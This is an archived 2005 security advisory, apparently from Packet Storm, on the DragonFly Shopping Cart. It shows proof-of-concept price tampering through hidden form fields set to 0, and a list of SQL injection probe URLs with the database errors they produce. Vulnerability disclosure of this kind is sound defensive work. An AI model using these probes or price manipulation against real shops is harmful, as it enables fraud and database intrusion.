exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dragonfly.txt

dragonfly.txt
Posted Jul 12, 2005
Authored by Diabolic Crab | Site hackerscenter.com

DragonFly shopping cart allows for SQL injection attacks and price manipulation.

tags | exploit, sql injection
SHA-256 | f3731ee7643b36fa0e65130b16541ef7e07f4dbac260d2b7479a4c697986b967
Download | Favorite | View

dragonfly.txt

Change Mirror Download

------=_NextPart_001_0012_01C586EF.F4564F50
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc =
or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005

Vendor: DragonFly Shopping Cart
Vendor Website: =
http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=3D5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow =
modifiying of prices along with Sql injection vulnerabilities.

Proof of Concept Exploits:

Hidden Price Value Vulnerability
You can modify these fields to modify the price of the product and thus =
be able to purchase the biggest and most expensive products for the =
cheapest possible prices, or even nothing.
/demo/dc_Categorieslist.asp
HPVV

<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" =
value=3D"15.49" size=3D"4">



/demo/dc_Categoriesview.asp
HPVV

<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4">



/demo/dc_productslist.asp
HPVV

<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4">



/demo/dc_productslist_Clearance.asp
HPVV

<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4">


There are also many other hidden fields like ip address etc which can be =
used to make the attack "technically" more anonymous though any normal =
logging system would catch you ;).



Sql Injections

/demo/dc_Categoriesview.asp??key=3D'&RecPerPage=3D5

Microsoft JET Database Engine error '80040e07'=20

Data type mismatch in criteria expression.=20

/demo/dc_Categoriesview.asp, line 1054=20



/demo/dc_Categoriesview.asp?key=3D%26dir%26
Microsoft JET Database Engine error '80040e14'=20

Syntax error (missing operator) in query expression '[CategoryKey] =3D =
&dir&'.=20

/demo/dc_Categoriesview.asp, line 1054=20



/demo/dc_productslist_Clearance.asp

Microsoft JET Database Engine error '80040e14'=20

Syntax error in string in query expression '([ProductActive] =3D 'show' =
AND ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005# AND ProductClearanceEndDate >=3D #7/7/2005#)) AND =
((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' =
))'.=20

/demo/dc_productslist_Clearance.asp, line 292=20



/demo/dc_productslist_Clearance.asp?cmd=3D%27

Microsoft JET Database Engine error '80040e14'=20

Syntax error in string in query expression '([ProductActive] =3D 'show' =
AND ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005# AND ProductClearanceEndDate >=3D #7/7/2005#)) AND =
((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' =
))'.=20

/demo/dc_productslist_Clearance.asp, line 292=20



/demo/ratings.asp??PID=3D'

Microsoft JET Database Engine error '80040e14'=20

Syntax error (missing operator) in query expression '[ProductKey]=3D''.=20

/demo/ratings.asp, line 68=20



/demo/dc_Productsview.asp

Microsoft JET Database Engine error '80040e07'=20

Data type mismatch in criteria expression.=20

/demo/dc_Productsview.asp, line 931=20



/demo/dc_forum_Postslist.asp?start=3D'

Microsoft VBScript runtime error '800a000d'=20

Type mismatch: 'nTotalRecs'=20

/demo/dc_forum_Postslist.asp, line 319=20



/demo/dc_forum_Postslist.asp?key_m=3D'

Microsoft JET Database Engine error '80040e07'=20

Data type mismatch in criteria expression.=20

/demo/dc_forum_Postslist.asp, line 200=20



/demo/dc_forum_Postslist.asp?psearch=3D1&Submit=3DSearch%20%28%2A%29&psea=
rchtype=3D'

Microsoft JET Database Engine error '80040e07'=20

Data type mismatch in criteria expression.=20

/demo/dc_forum_Postslist.asp, line 200=20



/demo/dc_forum_Postslist.asp?psearch=3D'&Submit=3DSearch%20%28%2A%29&psea=
rchtype=3D1

Microsoft JET Database Engine error '80040e07'=20

Data type mismatch in criteria expression.=20

/demo/dc_forum_Postslist.asp, line 200=20


Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.



-------------------------------------------------------------------------=
-------
=20
Sincerely,=20
Diabolic Crab=20

------=_NextPart_001_0012_01C586EF.F4564F50
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc or even code them. Learn more at <A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Dragonfly =
Shopping Cart=20
Multiple vulnerabilities<BR>Date: 11/07/2005</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: DragonFly Shopping =
Cart<BR>Vendor Website:=20
<A=20
href=3D"http://www.incredibleinteractive.com/Active/dc_Productsview.asp?k=
ey=3D5">http://www.incredibleinteractive.com/Active/dc_Productsview.asp?k=
ey=3D5</A><BR>Summary:=20
Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying =
of prices=20
along with Sql injection vulnerabilities.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Hidden Price Value Vulnerability<BR>You =
can modify=20
these fields to modify the price of the product and thus be able to =
purchase the=20
biggest and most expensive products for the cheapest possible prices, or =
even=20
nothing.<BR>/demo/dc_Categorieslist.asp<BR>HPVV</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"15.49" =
size=3D"4"></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial =
size=3D2>/demo/dc_Categoriesview.asp<BR>HPVV</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4"></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial =
size=3D2>/demo/dc_productslist.asp<BR>HPVV</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4"></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial=20
size=3D2>/demo/dc_productslist_Clearance.asp<BR>HPVV</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4"></FONT></DIV>
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>
<DIV><BR>There are also many other hidden fields like ip address etc =
which can=20
be used to make the attack "technically" more anonymous though any =
normal=20
logging system would catch you ;).</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>Sql Injections</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_Categoriesview.asp??key=3D'&RecPerPage=3D5</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_Categoriesview.asp, line 1054 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_Categoriesview.asp?key=3D%26dir%26<BR>Microsoft JET =
Database Engine=20
error '80040e14' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Syntax error (missing operator) in query expression '[CategoryKey] =
=3D=20
&dir&'. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_Categoriesview.asp, line 1054 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_productslist_Clearance.asp</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e14' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Syntax error in string in query expression '([ProductActive] =3D =
'show' AND=20
([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005#=20
AND ProductClearanceEndDate >=3D #7/7/2005#)) AND ((([ProductName] =
LIKE '%1%'=20
OR [ProductDescriptionShort] LIKE '%1%') ' ))'. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_productslist_Clearance.asp, line 292 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_productslist_Clearance.asp?cmd=3D%27</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e14' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Syntax error in string in query expression '([ProductActive] =3D =
'show' AND=20
([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005#=20
AND ProductClearanceEndDate >=3D #7/7/2005#)) AND ((([ProductName] =
LIKE '%1%'=20
OR [ProductDescriptionShort] LIKE '%1%') ' ))'. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_productslist_Clearance.asp, line 292 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/ratings.asp??PID=3D'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e14' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Syntax error (missing operator) in query expression =
'[ProductKey]=3D''.=20
</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/ratings.asp, line 68 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_Productsview.asp</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_Productsview.asp, line 931 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp?start=3D'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft VBScript runtime error '800a000d' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Type mismatch: 'nTotalRecs' </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 319 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp?key_m=3D'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 200 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp?psearch=3D1&Submit=3DSearch%20%28%2=
A%29&psearchtype=3D'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 200 </DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp?psearch=3D'&Submit=3DSearch%20%28%2=
A%29&psearchtype=3D1</DIV>
<DIV>&nbsp;</DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV>&nbsp;</DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV>&nbsp;</DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 200 </DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Author:<BR>These vulnerabilties have been found and released by =

Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, =
please feel=20
free to contact me regarding these vulnerabilities. You can find me at, =
<A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with =
php.<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT><BR>
<HR>
 <BR>Sincerely, <BR>Diabolic Crab <BR><IMG=20
src=3D"http://digitalparadox.org/dc.gif" border=3D0></DIV></BODY></HTML>

------=_NextPart_001_0012_01C586EF.F4564F50--
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close